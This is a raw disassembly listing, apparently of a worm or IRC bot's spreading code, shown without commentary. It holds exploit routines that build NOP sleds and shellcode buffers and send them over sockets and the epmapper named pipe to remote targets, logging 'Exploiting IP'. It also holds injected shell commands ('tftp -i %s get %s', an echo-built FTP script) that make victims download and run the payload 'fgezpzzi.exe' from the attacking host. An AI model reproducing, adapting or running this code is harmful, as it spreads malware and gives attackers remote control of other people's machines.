push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
mov esi, [ebp+arg_4]
lea eax, [ebp+Dest]
add esp, 10h
mov [esi+14h], eax
mov eax, offset dword_4CE6F4
push edi
push eax
push eax
push esi
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+1Ch], edi
call dword_4CBA74
cmp eax, 5
mov ebx, 4C3h
jz short loc_40DC22
cmp eax, ebx
jnz short loc_40DC2C
loc_40DC22: ; CODE XREF: sub_40DB5E+BE�j
push edi
push edi
push edi
push esi
call dword_4CBA74
loc_40DC2C: ; CODE XREF: sub_40DB5E+C2�j
cmp eax, 5
jz short loc_40DC3A
cmp eax, ebx
jz short loc_40DC3A
push 1
pop eax
jmp short loc_40DC3C
; ---------------------------------------------------------------------------
loc_40DC3A: ; CODE XREF: sub_40DB5E+D1�j
; sub_40DB5E+D5�j
xor eax, eax
loc_40DC3C: ; CODE XREF: sub_40DB5E+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40DB5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC41 proc near ; CODE XREF: .text:0040DFC6�p
; .text:0040E0A6�p
Dest = word ptr -354h
var_34E = byte ptr -34Eh
Source = word ptr -124h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset off_432948
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_432940 ; "\\\\"
lea edi, [ebp+Dest]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, byte_43DB88
pop ecx
mov byte ptr [ebp+Source], al
xor eax, eax
lea edi, [ebp+Source+1]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+Source]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call ds:dword_4270E8 ; MultiByteToWideChar
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
lea eax, [ebp+var_C]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
add esp, 10h
loc_40DCD2: ; CODE XREF: sub_40DC41+AF�j
push esi
lea eax, [ebp+Dest]
push esi
push eax
call dword_4CB90C
test eax, eax
jz short loc_40DCF2
push 7D0h
call ds:dword_427080 ; Sleep
jmp short loc_40DCD2
; ---------------------------------------------------------------------------
loc_40DCF2: ; CODE XREF: sub_40DC41+A2�j
push 1
pop eax
pop edi
pop esi
leave
retn
sub_40DC41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCF9 proc near ; CODE XREF: .text:0040DFF5�p
; .text:0040E133�p
Src = byte ptr -3004h
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
Dst = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call __alloca_probe
push esi
push edi
push offset Str ; "fgezpzzi.exe"
mov esi, 0A7h
push [ebp+arg_0]
mov [ebp+var_4], esi
call sub_40AA06
pop ecx
push eax ; Str
lea eax, [ebp+Src]
push 1000h ; int
push eax ; Dst
call sub_40B22B
mov edi, eax
add esp, 10h
test edi, edi
jz loc_40DF48
push ebx
mov ebx, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push 30h ; Size
lea eax, [ebp+var_2004]
push ebx ; Src
push eax ; Dst
call _memcpy
push esi ; Size
lea eax, [ebp+Dst]
push 0FFFFFF90h ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Src]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_1F2D]
push eax ; Dst
call _memcpy
add esp, 24h
lea esi, [edi+0D7h]
loc_40DD7E: ; CODE XREF: sub_40DCF9+D3�j
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jz short loc_40DDCE
mov esi, [ebp+var_4]
push 30h ; Size
lea eax, [ebp+var_2004]
inc esi
push ebx ; Src
push eax ; Dst
mov [ebp+var_4], esi
call _memcpy
push esi ; Size
lea eax, [ebp+Dst]
push 0FFFFFF90h ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Src]
push edi ; Size
push eax ; Src
lea eax, [ebp+esi+Dst]
push eax ; Dst
call _memcpy
add esp, 24h
lea esi, [esi+edi+30h]
jmp short loc_40DD7E
; ---------------------------------------------------------------------------
loc_40DDCE: ; CODE XREF: sub_40DCF9+90�j
cmp [ebp+arg_C4], 0
jz short loc_40DDE9
cmp [ebp+arg_C0], 3
jz short loc_40DDF2
cmp [ebp+arg_C0], 0
jmp short loc_40DDF0
; ---------------------------------------------------------------------------
loc_40DDE9: ; CODE XREF: sub_40DCF9+DC�j
cmp [ebp+arg_C0], 3
loc_40DDF0: ; CODE XREF: sub_40DCF9+EE�j
jnz short loc_40DDFB
loc_40DDF2: ; CODE XREF: sub_40DCF9+E5�j
push 4
push offset dword_43293C
jmp short loc_40DE02
; ---------------------------------------------------------------------------
loc_40DDFB: ; CODE XREF: sub_40DCF9:loc_40DDF0�j
push 4 ; Size
push offset dword_432938 ; Src
loc_40DE02: ; CODE XREF: sub_40DCF9+100�j
lea eax, [ebp+var_1FE0]
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h ; Size
push offset dword_432470 ; Src
push eax ; Dst
call _memcpy
push 10h ; Size
lea eax, [ebp+var_CA4]
push offset dword_4327D4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_2004]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_C94]
push eax ; Dst
call _memcpy
lea edi, [esi+370h]
push 3Ch ; Size
push offset off_4327E8 ; Src
lea eax, [ebp+edi+var_1004]
push eax ; Dst
call _memcpy
add edi, 3Ch
push 30h ; Size
push offset dword_432828 ; Src
lea eax, [ebp+edi+var_1004]
push eax ; Dst
call _memcpy
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi ; Size
mov [ebp+var_E78], eax
call _malloc
add esp, 40h
mov ebx, eax
push esi ; Size
push 0 ; Val
push ebx ; Dst
call _memset
lea eax, [ebp+var_1004]
push edi ; Size
push eax ; Src
push ebx ; Dst
call _memcpy
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_40DF48: ; CODE XREF: sub_40DCF9+3E�j
pop edi
pop esi
leave
retn
sub_40DCF9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1338h
call __alloca_probe
cmp dword ptr [ebp+0A8h], 1BDh
push ebx
push esi
push edi
jnz loc_40E0BA
lea eax, [ebp-34h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_40DB5E
pop ecx
test eax, eax
pop ecx
jz loc_40E1CA
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-338h]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call _sprintf
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp-338h]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call ds:dword_4270F8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jnz short loc_40DFD1
loc_40DFC2: ; CODE XREF: .text:0040E072�j
lea eax, [ebp+0Ch]
push eax
call sub_40DC41
pop ecx
jmp loc_40E1CA
; ---------------------------------------------------------------------------
loc_40DFD1: ; CODE XREF: .text:0040DFC0�j
lea eax, [ebp+0Ch]
push 2
push eax
call sub_4182CD
pop ecx
lea esi, [ebp+8]
pop ecx
push 1
push eax
lea eax, [ebp-10h]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40DCF9
add esp, 0C8h
cmp eax, ebx
mov [ebp-8], eax
jz short loc_40E069
mov edi, 186A0h
push edi
call _malloc
mov esi, eax
push edi
push ebx
push esi
call _memset
add esp, 10h
lea eax, [ebp-0Ch]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push offset dword_432424
push dword ptr [ebp-4]
call ds:dword_4270F4 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_40E059
lea eax, [ebp-14h]
push ebx
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call ds:dword_4270F0 ; WriteFile
test eax, eax
jnz short loc_40E077
loc_40E059: ; CODE XREF: .text:0040E03F�j
push esi
call sub_41BA91
push dword ptr [ebp-8]
call sub_41BA91
pop ecx
pop ecx
loc_40E069: ; CODE XREF: .text:0040E005�j
push dword ptr [ebp-4]
call ds:dword_427070 ; CloseHandle
jmp loc_40DFC2
; ---------------------------------------------------------------------------
loc_40E077: ; CODE XREF: .text:0040E057�j
lea eax, [ebp-0Ch]
push ebx
push eax
push edi
push esi
push dword ptr [ebp-4]
call ds:dword_4270EC ; ReadFile
push dword ptr [ebp-8]
mov edi, eax
call sub_41BA91
push esi
call sub_41BA91
pop ecx
pop ecx
push dword ptr [ebp-4]
call ds:dword_427070 ; CloseHandle
lea eax, [ebp+0Ch]
push eax
call sub_40DC41
cmp edi, 1
pop ecx
jnz loc_40E1DE
jmp loc_40E1CA
; ---------------------------------------------------------------------------
loc_40E0BA: ; CODE XREF: .text:0040DF66�j
lea eax, [ebp+0Ch]
push 1
push eax
call sub_4182CD
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_40E1CA
xor ebx, ebx
push ebx
push 1
push 2
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_40E1CA
push 10h
lea eax, [ebp-24h]
push ebx
push eax
call _memset
add esp, 0Ch
mov word ptr [ebp-24h], 2
push dword ptr [ebp+0A8h]
call dword_4CB9D4 ; htons
mov [ebp-22h], ax
lea eax, [ebp+0Ch]
push eax
call dword_4CBA14 ; inet_addr
mov [ebp-20h], eax
push ebx
lea eax, [ebp-0Ch]
push esi
push eax
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40DCF9
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp-8], esi
jnz short loc_40E14C
push dword ptr [ebp-4]
jmp short loc_40E1C4
; ---------------------------------------------------------------------------
loc_40E14C: ; CODE XREF: .text:0040E145�j
mov edi, [ebp-4]
lea eax, [ebp-24h]
push 10h
push eax
push edi
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40E164
loc_40E161: ; CODE XREF: .text:0040E176�j
push esi
jmp short loc_40E1BD
; ---------------------------------------------------------------------------
loc_40E164: ; CODE XREF: .text:0040E15F�j
push ebx
push 48h
push offset dword_432424
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E161
mov esi, 1000h
push ebx
lea eax, [ebp-1338h]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push ebx
push dword ptr [ebp-0Ch]
push dword ptr [ebp-8]
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E1A5
push dword ptr [ebp-8]
jmp short loc_40E1BD
; ---------------------------------------------------------------------------
loc_40E1A5: ; CODE XREF: .text:0040E19E�j
push ebx
lea eax, [ebp-1338h]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push dword ptr [ebp-8]
cmp eax, 0FFFFFFFFh
jnz short loc_40E1D1
loc_40E1BD: ; CODE XREF: .text:0040E162�j
; .text:0040E1A3�j
call sub_41BA91
pop ecx
push edi
loc_40E1C4: ; CODE XREF: .text:0040E14A�j
call dword_4CBA6C ; closesocket
loc_40E1CA: ; CODE XREF: .text:0040DF7D�j
; .text:0040DFCC�j ...
xor eax, eax
jmp loc_40E28D
; ---------------------------------------------------------------------------
loc_40E1D1: ; CODE XREF: .text:0040E1BB�j
call sub_41BA91
pop ecx
push edi
call dword_4CBA6C ; closesocket
loc_40E1DE: ; CODE XREF: .text:0040E0AF�j
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-234h]
push offset aTftpFileTransf ; "[TFTP]: File transfer complete to IP: %"...
push eax
call _sprintf
add esp, 0Ch
xor esi, esi
loc_40E1F8: ; CODE XREF: .text:0040E218�j
lea eax, [ebp-234h]
push eax
call sub_415E19
test eax, eax
pop ecx
jnz short loc_40E21C
push 1388h
call ds:dword_427080 ; Sleep
inc esi
cmp esi, 6
jl short loc_40E1F8
jmp short loc_40E28A
; ---------------------------------------------------------------------------
loc_40E21C: ; CODE XREF: .text:0040E207�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aSymantec ; "Symantec"
push eax
lea eax, [ebp-234h]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax
call _sprintf
add esp, 10h
cmp [ebp+0BCh], ebx
jnz short loc_40E268
push ebx
lea eax, [ebp-234h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409869
add esp, 14h
loc_40E268: ; CODE XREF: .text:0040E249�j
lea eax, [ebp-234h]
push eax
call sub_415D38
mov eax, [ebp+0B0h]
pop ecx
shl eax, 6
inc dword_431800[eax]
lea eax, dword_431800[eax]
loc_40E28A: ; CODE XREF: .text:0040E21A�j
push 1
pop eax
loc_40E28D: ; CODE XREF: .text:0040E1CC�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E292 proc near ; CODE XREF: sub_40E3F1+42A�p
var_5A0 = byte ptr -5A0h
Dest = byte ptr -1A0h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+Dst], 2
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_C], eax
mov ax, word_433290
push eax
call dword_4CB9D4 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40E3CA
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40E3CA
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_4CB9EC ; recv
mov edi, offset Str ; "fgezpzzi.exe"
push edi
push edi
push [ebp+arg_0]
call sub_40AA06
pop ecx
mov esi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
push dword_4CB710
push [ebp+arg_0]
call sub_40AA06
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E3CA
push 1F4h
call ds:dword_427080 ; Sleep
push edi
push offset aS ; "%s\r\n"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E3CE
loc_40E3CA: ; CODE XREF: sub_40E292+51�j
; sub_40E292+67�j ...
xor al, al
jmp short loc_40E3EC
; ---------------------------------------------------------------------------
loc_40E3CE: ; CODE XREF: sub_40E292+136�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_4CB9EC ; recv
push ebx
call dword_4CBA6C ; closesocket
mov al, 1
loc_40E3EC: ; CODE XREF: sub_40E292+13A�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E292 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E3F1 proc near ; CODE XREF: .text:0040E946�p
; .text:0040E968�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
Dst = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
Src = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
Str = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call __alloca_probe
mov eax, dword_43341C
push ebx
mov [ebp+var_10], eax
mov eax, dword_433420
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax ; Dest
call _sprintf
add esp, 0Ch
xor ebx, ebx
xor esi, esi
lea eax, [ebp+var_103]
loc_40E430: ; CODE XREF: sub_40E3F1+4E�j
mov cl, [ebp+esi+Str]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_40E430
push 60h ; Size
lea eax, [ebp+var_B4]
push offset dword_432EA0 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_84]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC_3+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax ; Src
lea eax, [ebp+var_B1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax ; Src
lea eax, [ebp+var_87]
push eax ; Dst
call _memcpy
mov ax, word_433290
add esp, 2Ch
push eax
call dword_4CB9D4 ; htons
xor eax, 9999h
push 2 ; Size
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax ; Src
push offset dword_432BA0 ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_40E5ED
mov edi, 0DACh
lea eax, [ebp+Dst]
push edi ; Size
push 90h ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_C0]
push 4 ; Size
imul eax, 3Ch
lea eax, dword_4332D0[eax]
mov [ebp+var_14], eax
push eax ; Src
lea eax, [ebp+var_14E0]
push eax ; Dst
call _memcpy
mov esi, offset aI_1 ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_14D0]
push esi ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_11AC]
push offset dword_433408 ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_11A8]
push [ebp+var_14] ; Src
push eax ; Dst
call _memcpy
add esp, 40h
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_119C]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 10h
xor esi, esi
lea eax, [ebp+var_4803]
loc_40E5A6: ; CODE XREF: sub_40E3F1+1C6�j
mov cl, [ebp+esi+Dst]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_40E5A6
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi ; Size
push 31h ; Val
push eax ; Dst
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call _memset
push esi ; Size
lea eax, [ebp+var_68DC]
push 31h ; Val
push eax ; Dst
call _memset
add esp, 18h
jmp short loc_40E644
; ---------------------------------------------------------------------------
loc_40E5ED: ; CODE XREF: sub_40E3F1+118�j
push 7D0h ; Size
lea eax, [ebp+var_F14]
push 90h ; Val
push eax ; Dst
call _memset
mov esi, offset aI_1 ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_E74]
push esi ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_10]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_10]
push eax ; Src
lea eax, [ebp+var_758]
push eax ; Dst
call _memcpy
mov eax, dword_4332D0
add esp, 2Ch
mov [ebp+var_768], eax
loc_40E644: ; CODE XREF: sub_40E3F1+1FA�j
push 0E29h ; Size
lea eax, [ebp+var_2CA8]
push 31h ; Val
push eax ; Dst
call _memset
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E683
loc_40E67C: ; CODE XREF: sub_40E3F1+2B9�j
; sub_40E3F1+2E0�j ...
xor al, al
jmp loc_40E82B
; ---------------------------------------------------------------------------
loc_40E683: ; CODE XREF: sub_40E3F1+289�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push ebx
push 68h
push offset dword_432F04
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E67C
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push ebx
push 0A0h
push offset dword_432F70
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E67C
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4CB9EC ; recv
cmp [ebp+arg_C0], ebx
jz loc_40E799
push 68h ; Size
lea eax, [ebp+var_89B4]
push offset dword_433128 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_4804]
push 1B5Ah ; Size
push eax ; Src
lea eax, [ebp+var_894C]
push eax ; Dst
call _memcpy
push 70h ; Size
lea eax, [ebp+var_68DC]
push offset dword_433194 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_3770]
push 0A5Eh ; Size
push eax ; Src
lea eax, [ebp+var_686C]
push eax ; Dst
call _memcpy
push 84h ; Size
lea eax, [ebp+var_5DA8]
push offset dword_433208 ; Src
push eax ; Dst
call _memcpy
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E67C
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_4CB9EC ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_40E7EF
; ---------------------------------------------------------------------------
loc_40E799: ; CODE XREF: sub_40E3F1+2F8�j
push 7Ch ; Size
lea eax, [ebp+var_2CA8]
push offset dword_433014 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_F14]
push 7D0h ; Size
push eax ; Src
lea eax, [ebp+var_2C2C]
push eax ; Dst
call _memcpy
push 90h ; Size
lea eax, [ebp+var_245C]
push offset off_433094 ; Src
push eax ; Dst
call _memcpy
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_40E7EF: ; CODE XREF: sub_40E3F1+3A6�j
push eax
push edi
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E67C
push 12Ch
call ds:dword_427080 ; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E292
add esp, 0BCh
test al, al
setnz al
loc_40E82B: ; CODE XREF: sub_40E3F1+28D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E3F1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call _memset
add esp, 0Ch
lea eax, [ebp+0Ch]
mov word ptr [ebp-14h], 2
push eax
call dword_4CBA14 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call dword_4CB9D4 ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40E929
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40E929
push edi
push 89h
push offset dword_432C88
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E929
mov esi, 640h
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_4CB9EC ; recv
push edi
push 0A8h
push offset dword_432D14
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E929
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_4CB9EC ; recv
push edi
push 0DEh
push offset dword_432DC0
push ebx
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E929
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_4CB9EC ; recv
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_40E933
dec eax
jz short loc_40E930
loc_40E929: ; CODE XREF: .text:0040E884�j
; .text:0040E89A�j ...
xor eax, eax
jmp loc_40E9F6
; ---------------------------------------------------------------------------
loc_40E930: ; CODE XREF: .text:0040E927�j
push edi
jmp short loc_40E957
; ---------------------------------------------------------------------------
loc_40E933: ; CODE XREF: .text:0040E924�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E3F1
add esp, 0C4h
test al, al
jnz short loc_40E977
push 1
loc_40E957: ; CODE XREF: .text:0040E931�j
push ebx
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E3F1
add esp, 0C4h
test al, al
jz short loc_40E97E
loc_40E977: ; CODE XREF: .text:0040E953�j
mov dword ptr [ebp-4], 1
loc_40E97E: ; CODE XREF: .text:0040E975�j
push ebx
call dword_4CBA6C ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_40E9F3
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aSymantec ; "Symantec"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-214h]
push 200h
push eax
call __snprintf
push 0
lea eax, [ebp-214h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409869
lea eax, [ebp-214h]
push eax
call sub_415D38
mov eax, [ebp+0B0h]
add esp, 2Ch
shl eax, 6
inc dword_431800[eax]
lea eax, dword_431800[eax]
loc_40E9F3: ; CODE XREF: .text:0040E989�j
push 1
pop eax
loc_40E9F6: ; CODE XREF: .text:0040E92B�j
pop edi
pop esi
pop ebx
leave
retn
